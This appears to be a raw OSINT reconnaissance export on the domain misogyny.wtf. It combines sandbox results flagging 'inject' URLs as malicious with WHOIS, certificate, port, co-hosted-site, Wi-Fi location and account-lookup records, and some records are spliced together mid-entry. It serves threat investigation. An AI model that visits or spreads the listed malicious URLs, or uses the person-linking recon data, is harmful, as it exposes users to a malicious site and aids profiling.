u'ac8062a45cb524ba2f43df875b64dd040e0bb013e30c292b2ba51c6ed020380142aeb95b0842cb0ee3bfb8b7b9ba3e7c80b45c584b6e8f34fe099a9b70e52277', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'submission_id': u'638f5c1908fc134fee52854b', u'created_at': u'2022-12-06T15:13:29+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:13:29+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 8, u'machine_learning_models': [], u'total_signatures': 11, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': 
u'b63910f34c83d7d38b0f574db16da648', u'network_mode': u'default', u'processes': [], u'sha1': u'a938a338ea8d3711b0243d7fac823299ef963246', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [ misogyny.wtf 2022-12-18 00:13:55 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun/inject/MTJ8Vp5aynR51YMM 2022-12-18 00:12:44 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3036::ac43:a9d7', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3036::ac43:a9d7 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 172.67.147.230 2022-12-18 00:05:12 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], 
u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fe0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fe0_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fe0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4064"\n "IsoScope_fe0_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_fe0_ConnHashTable<4064>_HashTable_Mutex"\n 
"Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fe0_IE_EarlyTabStart_0xd9c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "7XNUCQ2H.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n Dropped file: "335MX9XB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n Dropped file: "36YYHGU3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_9FF521F3-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6B533628-7574-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "7XNUCQ2H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7XNUCQ2H.txt]- [targetUID: 00000000-00004064]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: 
N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "335MX9XB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\335MX9XB.txt]- [targetUID: 00000000-00004064]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004064]\n "~DF8FB903D113AF51F8.TMP" has type "data"- Location: [%TEMP%\\~DF8FB903D113AF51F8.TMP]- [targetUID: 00000000-00004064]\n "36YYHGU3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36YYHGU3.txt]- [targetUID: 00000000-00004064]\n "~DF6D539535B29E264B.TMP" has type "data"- Location: [%TEMP%\\~DF6D539535B29E264B.TMP]- [targetUID: 00000000-00004064]\n "RecoveryStore._9FF521F1-7571-11ED-AAD5-0800278066F7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF0CA44B466F93387E.TMP" has type "data"- Location: [%TEMP%\\~DF0CA44B466F93387E.TMP]- [targetUID: 00000000-00004064]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/inject/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'14/92 Antivirus vendors marked sample as malicious (15% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'638f5c1808fc134fee52854a', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, 
u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'sha512': u'ac8062a45cb524ba2f43df875b64dd040e0bb013e30c292b2ba51c6ed020380142aeb95b0842cb0ee3bfb8b7b9ba3e7c80b45c584b6e8f34fe099a9b70e52277', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'submission_id': u'638f5c1908fc134fee52854b', u'created_at': u'2022-12-06T15:13:29+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:13:29+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 8, u'machine_learning_models': [], u'total_signatures': 11, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'b63910f34c83d7d38b0f574db16da648', u'network_mode': u'default', u'processes': [], u'sha1': u'a938a338ea8d3711b0243d7fac823299ef963246', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [ | Source Data: 20.226.83.185

2022-12-18 00:09:52 | Open TCP Port | Risky: No | Module: Pulsedive | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: 188.114.96.20:80 | Source Data: 188.114.96.0/24

2022-12-18 00:03:20 | Affiliate - Internet Name | Risky: No | Module: DNS Resolver | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: lfbn-nic-1-332-109.w90-116.abo.wanadoo.fr | Source Data: 90.116.166.109

2022-12-18 00:21:11 | WiFi Access Point Nearby | Risky: No | Module: Wigle.net | Children: 0 | Correlations: 0 | Distance: 5 | Starred: 0 | Annotation: None | Data: 07:55:46 (Net ID: 00:02:2D:05:BB:87) | Source Data: 37.780462,-122.390564

2022-12-18 00:05:16 | Account on External Site | Risky: No | Module: Account Finder | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: SoundCloud (Category: music) https://soundcloud.com/rasputain | Source Data: rasputain

2022-12-18 00:12:14 | Raw Data from RIRs | Risky: No | Module: ipapi.co | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} | Source Data: 188.114.97.1

2022-12-18 00:03:06 | Internet Name - Unresolved | Risky: No | Module: DNS Resolver | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: plague.fun | Source Data:
    Certificate: Version: 3 (0x2); Serial Number: 48:20:40:e9:11:6c:46:fc:13:c8:c6:91:95:a6:d1:9b; Signature Algorithm: sha256WithRSAEncryption
    Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
    Validity: Not Before: Oct 30 20:43:46 2022 GMT; Not After: Jan 28 20:43:45 2023 GMT
    Subject: CN=*.plague.fun
    Subject Public Key Info: Public Key Algorithm: rsaEncryption; RSA Public-Key: (2048 bit); Exponent: 65537 (0x10001)
    X509v3 Key Usage: critical Digital Signature, Key Encipherment; X509v3 Extended Key Usage: TLS Web Server Authentication; X509v3 Basic Constraints: critical CA:FALSE
    X509v3 Subject Key Identifier: 8D:8C:CC:F4:82:11:E1:FE:38:8C:7A:89:4C:FB:51:C6:26:33:92:56; X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
    Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/N5PKkvSDEsE; CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
    X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun
    X509v3 Certificate Policies: Policy: 2.23.140.1.2.1; Policy: 1.3.6.1.4.1.11129.2.5.3
    X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/lyHNLHo1elk.crl
    CT Precertificate Poison: critical NULL
    Signature Algorithm: sha256WithRSAEncryption

2022-12-18 00:09:41 | Co-Hosted Site | Risky: No | Module: HackerTarget | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: acncnfrm.rcvry.workers.dev | Source Data: 172.67.147.230

2022-12-18 00:16:46 | Co-Hosted Site | Risky: No | Module: ThreatMiner | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: crushingswelteringprogram.w467ujhgs3.repl.co | Source Data: 34.149.204.188

2022-12-18 00:41:01 | Similar Domain - Whois | Risky: No | Module: Whois | Children: 2 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Source Data: misogyny.co | Data:
    Registry record: Domain Name: misogyny.co; Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR; Registrar WHOIS Server: whois.namecheap.com; Registrar URL: http://www.namecheap.com; Updated Date: 2022-04-14T13:53:29Z; Creation Date: 2018-03-07T07:39:37Z; Registry Expiry Date: 2023-03-07T07:39:37Z; Registrar: NameCheap, Inc.; Registrar IANA ID: 1068; Registrar Abuse Contact Email: abuse@namecheap.com; Registrar Abuse Contact Phone: +1.6613102107; Domain Status: ok https://icann.org/epp#ok
    Registrant, Admin and Tech contact fields: REDACTED FOR PRIVACY (Registrant Organization: Privacy service provided by Withheld for Privacy ehf; Registrant State/Province: Capital Region; Registrant Country: IS; Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.)
    Name Server: ns2.dan.com; Name Server: ns1.dan.com; DNSSEC: unsigned; URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/; Last update of WHOIS database: 2022-12-18T00:41:01Z
    Registrar record: Domain name: misogyny.co; Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR; Registrar WHOIS Server: whois.namecheap.com; Registrar URL: http://www.namecheap.com; Updated Date: 2022-02-22T03:37:22.39Z; Creation Date: 2018-03-07T07:39:37.84Z; Registrar Registration Expiration Date: 2023-03-07T07:39:37.84Z; Registrar: NAMECHEAP INC; Registrar IANA ID: 1068; Registrar Abuse Contact Email: abuse@namecheap.com; Registrar Abuse Contact Phone: +1.9854014545; Reseller: NAMECHEAP INC; Domain Status: ok https://icann.org/epp#ok
    Registrant, Admin and Tech contact (identical for all three): Name: Redacted for Privacy; Organization: Privacy service provided by Withheld for Privacy ehf; Street: Kalkofnsvegur 2; City: Reykjavik; State/Province: Capital Region; Postal Code: 101; Country: IS; Phone: +354.4212434; Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com
    Name Server: ns1.dan.com; Name Server: ns2.dan.com; DNSSEC: unsigned; URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/; Last update of WHOIS database: 2022-12-17T03:41:01.74Z

2022-12-18 00:20:42 | BGP AS Membership | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None | Data: 8075 | Source Data: 4.228.83.86

2022-12-18 00:22:07 | HTTP Headers | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: {"_encoding": {"Connection": "DISPLAY_UTF8"}, "Connection": ["close"]} | Source Data: 34.149.204.188

2022-12-18 00:21:06 | Open TCP Port | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: 172.67.147.230:2086 | Source Data: 172.67.147.230

2022-12-18 00:21:10 | WiFi Access Point Nearby | Risky: No | Module: Wigle.net | Children: 0 | Correlations: 0 | Distance: 5 | Starred: 0 | Annotation: None | Data: myLGNet55FA (Net ID: 00:01:36:59:55:F8) | Source Data: 37.7803446,-122.3906132

2022-12-18 00:11:20 | Vulnerability - CVE Medium | Risky: Yes | Module: Tool - testssl.sh | Children: 0 | Correlations: 1 | Distance: 2 | Starred: 0 | Annotation: None | Data: CVE-2011-3389 https://nvd.nist.gov/vuln/detail/CVE-2011-3389 Score: 4.3 Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | Source Data: 188.114.97.1

2022-12-18 00:36:38 | Malicious Affiliate IP Address | Risky: Yes | Module: VirusTotal | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: VirusTotal [81.88.52.239] https://www.virustotal.com/en/ip-address/81.88.52.239/information/ | Source Data: 81.88.52.239

2022-12-18 00:16:37 | Physical Location | Risky: No | Module: numverify | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: FR | Source Data: +33892556677

2022-12-18 00:06:13 | SSL Certificate - Raw Data | Risky: No | Module: Certificate Transparency | Children: 0 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None | Source Data: misogyny.wtf | Data:
    Certificate: Version: 3 (0x2); Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a; Signature Algorithm: ecdsa-with-SHA384
    Issuer: C=US, O=Let's Encrypt, CN=E1
    Validity: Not Before: Sep 20 20:09:20 2022 GMT; Not After: Dec 19 20:09:19 2022 GMT
    Subject: CN=*.misogyny.wtf
    Subject Public Key Info: Public Key Algorithm: id-ecPublicKey; Public-Key: (256 bit); ASN1 OID: prime256v1; NIST CURVE: P-256
    X509v3 Key Usage: critical Digital Signature; X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication; X509v3 Basic Constraints: critical CA:FALSE
    X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46; X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
    Authority Information Access: OCSP - URI:http://e1.o.lencr.org; CA Issuers - URI:http://e1.i.lencr.org/
    X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf
    X509v3 Certificate Policies: Policy: 2.23.140.1.2.1; Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org
    CT Precertificate SCTs: Signed Certificate Timestamp: Version: v1 (0x0); Timestamp: Sep 20 21:09:20.492 2022 GMT; Extensions: none; Signature: ecdsa-with-SHA256. Signed Certificate Timestamp: Version: v1 (0x0); Timestamp: Sep 20 21:09:20.448 2022 GMT; Extensions: none; Signature: ecdsa-with-SHA256
    Signature Algorithm: ecdsa-with-SHA384

2022-12-18 00:21:30 | Open TCP Port | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: 172.67.190.129:2082 | Source Data: 172.67.190.129

2022-12-18 00:18:30 | Affiliate - Internet Name | Risky: No | Module: DNS Resolver | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: lfbn-nic-1-313-183.w90-116.abo.wanadoo.fr | Source Data: 90.116.149.183

2022-12-18 00:21:09 | Software Used | Risky: Yes | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: CloudFlare CloudFlare Load Balancer | Source Data: 188.114.96.0

2022-12-18 00:07:17 | Raw Data from RIRs | Risky: No | Module: Hybrid Analysis | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Source Data: 172.67.169.215 | Data:
    [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'172.67.169.215'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://etl.am/', u'signatures': [
    {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'threat_level_human': u'informative', u'relevance': 3, u'threat_level': 0, u'type': 4},
    {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'threat_level_human': u'informative', u'relevance': 3, u'threat_level': 0, u'type': 3},
    {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'threat_level_human': u'informative', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'},
    {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'threat_level_human': u'informative', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "cacerts.digicert.com"\n "etl.am"\n "fonts.googleapis.com"\n "fonts.gstatic.com"'},
    {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'threat_level_human': u'informative', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.169.215:443"\n "142.250.72.234:443"\n "142.250.72.227:80"\n "142.250.72.227:443"\n "104.18.11.39:80"'},
    {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'threat_level_human': u'informative', u'relevance': 3, u'threat_level': 0, u'type': 8},
    {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-55', u'name': u'Reads the registry for installed applications', u'threat_level_human': u'informative', u'relevance': 10, u'threat_level': 0, u'type': 3},
    {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'threat_level_human': u'informative', u'relevance': 10, u'threat_level': 0, u'type': 2},
    {u'category': u'Exploit/Shellcode', u'origin': u'Registry Access', u'identifier': u'registry-65', u'name': u'Reads the Equation Editor Class Identifier (CLSID)', u'threat_level_human': u'informative', u'attck_id': None

2022-12-18 00:04:28 | Affiliate - Internet Name | Risky: No | Module: DNS Raw Records | Children: 2 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None | Data: dns2.registrar-servers.com | Source Data: misogyny.wtf

2022-12-18 00:14:01 | Open TCP Port | Risky: No | Module: Pulsedive | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: 188.114.96.138:80 | Source Data: 188.114.96.0/24

2022-12-18 00:21:13 | HTTP Headers | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77ae523eff6ee12f-ORD"]} | Source Data: 188.114.97.0

2022-12-18 00:06:31 | Company Name | Risky: No | Module: Company Name Extractor | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: Cloudflare\, Inc. | Source Data: C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com

2022-12-18 00:06:06 | Similar Domain | Risky: Yes | Module: Tool - DNSTwist | Children: 1 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None | Data: rasputin.fr | Source Data: rasputain.fr

2022-12-18 00:09:54 | Co-Hosted Site | Risky: No | Module: HackerTarget | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None | Data: buf-noodles.ga | Source Data: 172.67.147.230

2022-12-18 00:41:03 | Affiliate - Email Address | Risky: No | Module: E-Mail Address Extractor | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None | Data: abuse@godaddy.com | Source Data:
    Registry record: Domain Name: MISOGYNY.COM; Registry Domain ID: 1499316_DOMAIN_COM-VRSN; Registrar WHOIS Server: whois.godaddy.com; Registrar URL: http://www.godaddy.com; Updated Date: 2022-12-07T13:26:32Z; Creation Date: 1998-01-24T05:00:00Z; Registry Expiry Date: 2024-01-04T04:59:59Z; Registrar: GoDaddy.com, LLC; Registrar IANA ID: 146; Registrar Abuse Contact Email: abuse@godaddy.com; Registrar Abuse Contact Phone: 480-624-2505
    Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited; clientRenewProhibited https://icann.org/epp#clientRenewProhibited; clientTransferProhibited https://icann.org/epp#clientTransferProhibited; clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
    Name Server: NS3.AFTERNIC.COM; Name Server: NS4.AFTERNIC.COM; DNSSEC: unsigned; URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/; Last update of whois database: 2022-12-18T00:40:42Z
